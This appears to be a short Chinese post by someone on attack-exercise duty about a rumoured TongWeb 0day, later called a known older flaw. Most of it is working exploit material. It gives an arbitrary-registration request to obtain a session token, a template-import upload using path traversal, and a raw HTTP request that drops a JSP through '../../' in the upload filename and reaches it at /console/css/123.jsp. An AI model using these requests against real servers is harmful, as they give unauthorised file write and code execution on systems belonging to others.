昨晚爆0day了


今早同事发了个存疑的包,只能参考,zip包还不知道是否要特殊构造

1
2
3
4
5
6
7
据小道消息tongweb有这么个洞
/thirdParty/bind
任意用户注册,包发过去,会返回accesstoken(JSESSIONID),拿token打上传
{"username":"userxxxx","loginway": 1, "loginType": "xxx", "thirdId": "abcdefg”}
上传接口
/cmsmanager/template/import

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
POST /cmsmanager/template/import?isCover=1 HTTP/1.1
Host:
Connection: keep-alive
Content-Length: 203
Cache-Control: max-age=0
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzTBrV5AxIBJmIGYb
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://xxx/cmsmanager/template/import?root=/WEB-INF/t/cms/www/default/../
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=49A2BB1F6390761572AC33ED3C4846BA
sec-fetch-user: ?1

------WebKitFormBoundaryzTBrV5AxIBJmIGYb
Content-Disposition: form-data; name="uploadFile"; filename="1.zip"
Content-Type: application/zip

{{file(/Users/alan/PycharmProjects/Zhzj/test2.zip)}}
------WebKitFormBoundaryzTBrV5AxIBJmIGYb--
1
2
zip包要单独构造

后续同事说应该是默认账密登录

东方通那边说是nday

明天不用继续值守,周末保住了

询问过客户了,保住周末了属于是

嗯,应该是没什么问题

0day辟谣

演练群有大佬发了包了,是去年九月份的洞了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
POST /heimdall/deploy/upload?method=upload HTTP/1.1

Host: 

Accept: */*

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36

------WebKitFormBoundary8UaANmWAgM4BqBSs

Content-Disposition: form-data; name="file"; filename="../../applications/console/css/123.jsp"

<%

out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM=")));

new java.io.File(application.getRealPath(request.getServletPath())).delete();

%>

------WebKitFormBoundary8UaANmWAgM4BqBSs--

上传定位:GET /console/css/123.jsp HTTP/1.1